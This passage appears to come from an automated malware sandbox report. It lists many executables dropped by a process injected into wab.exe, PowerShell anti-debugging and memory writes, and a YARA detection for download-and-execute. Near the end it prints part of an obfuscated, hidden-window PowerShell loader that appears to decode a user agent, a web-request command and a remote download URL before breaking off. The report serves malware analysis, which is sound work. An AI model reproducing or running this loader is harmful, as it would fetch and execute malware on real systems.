              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\FLTLDR.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SELFCERT.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SCANPST.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\xlicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\ConfigSecurityPolicy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTEM.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSREC.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\accicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\lyncicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\IEContentService.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateSetup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\notification_click_helper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\SQLDumper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_proxy.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\officeappguardwin32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\wordicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\SPREADSHEETCOMPARE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pj11icon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\NisSrv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ACCICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSOICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Office\Office16\AppSharingHookController64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ONENOTE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\visicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeComRegisterShellARM64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\joticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSOHTMED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SkypeSrv\SKYPESERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\XLICONS.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\chrome.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedgewebview2.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateOnDemand.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-0409-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\NAMECONTROLSERVER.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pptico.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\outicon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\dbcicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\MSQRY32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-001F-040C-0000-0000000FF1CE}\misc.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Microsoft Shared\OFFICE16\LICLUA.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ORGCHART.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\osmclienticon.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\PPTICO.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\WORDICON.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrSanBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\GRAPH.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Uninstall.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\sscicons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\X86\MpCmdRun.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoadfsb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\MSOXMLED.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\mpextms.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OfficeScrBroker.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\Installer\setup.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\Wordconv.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Package Cache\{8bdfe669-9705-4184-9368-db9ce581e0e7}\VC_redist.x64.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\BHO\ie_to_edge_stub.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OcPubMgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\aimgr.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdateCore.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Container.Loader.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Temp\EUC7A5.tmp\MicrosoftEdgeUpdate.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\OLicenseHeartbeat.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\VPREVIEW.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\msedge_pwa_launcher.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\ProgramData\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\OLCFG.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\grv_icons.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Source Engine\OSE.EXEJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\msoasb.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Installer\{90160000-000F-0000-0000-0000000FF1CE}\pubs.exeJump to dropped file
              Source: C:\Program Files (x86)\Windows Mail\wab.exeDropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exeJump to dropped file
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5784Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6456Thread sleep count: 5923 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6968Thread sleep count: 3920 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 748Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
              Source: wab.exe, 00000009.00000002.2787822130.0000000006958000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX
              Source: wab.exe, 00000009.00000002.2787822130.000000000699D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWTwQ
              Source: powershell.exe, 00000002.00000002.2595858284.0000025070A47000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2787822130.00000000069BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: amsi64_1716.amsi.csv, type: OTHER
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1716, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR
              Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)
              Source: C:\Program Files (x86)\Windows Mail\wab.exeFile created: C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MsMpEng.exeJump to dropped file
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4340000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 30AFAB0Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Sanguinarily='Sub';$Sanguinarily+='strin';$Colour = 1;$Sanguinarily+='g';Function Circuted($Kropsvisiteret26){$Blazer=$Kropsvisiteret26.Length-$Colour;For($Tvrfljte=5;$Tvrfljte -lt $Blazer;$Tvrfljte+=6){$Intraperitoneally+=$Kropsvisiteret26.$Sanguinarily.Invoke( $Tvrfljte, $Colour);}$Intraperitoneally;}function Udkrte($Udmatningens){ . ($Polarizer) ($Udmatningens);}$Ontological=Circuted 'AlenlMGynobo AnimzCopiei Dekll UnbrlKaramaD,esk/ Abso5 edrr.C.apt0Clemp Notc(Dru,nWunifoiNailenPr.madCo.seoUnbuiwSheepsfrste MetalNUnderTL ndq Prede1Scrip0Postt.Penty0 dra.;Gidsl Spnd,WP ddii.rembnBa ng6 ,ram4B roc;Rkebi RaasxTermt6 D.ej4 Kn.r;Ringt LassorDiscjvCa.bi:archt1Bicen2Aftgt1O,tol. Sile0Sulfo)Diver Prof.G,fglaePen,acFalk,k Fi,hoNethi/Admir2Encin0Griff1 Tram0Cytis0M,tro1lufti0Kben 1Mech, ForblFDr.gaigkantrD,mmee Forrf gelsoSlag,x Sia./Lande1 Un i2Denot1Baand. E eb0 Sost ';$Pullouts=Circuted ' Eva,U,epousLu tleNonderMange- MellACamorgbkarveTo.fun UnpotZeppe ';$Skraaremmens=Circuted 'Gim ehLusketSidettSamlepcalcas Bo.i: Circ/Lseti/TruthwbackfwRegiswUbesl. karisDec neineq nCo kadBerylsRiotep lichaadaptcJenh,eGlott.BademcA osto .aktmD.ght/HydropDecimrH,spioDamas/Homeod.aretlXerot/ DesiiVi li4Gjord1 FreeaLupan7 alvf6 Loes ';$Spisestel=Circuted 'Bolte>Cubin ';$Polarizer=Circuted 'S irriFlykkeRa,idxKonst ';$Spiegeleisen='Decephalize';$Thermoremanent12 = Circuted ' Hecte Frejc,vigehPrem,oUdtry Udska%Klemea 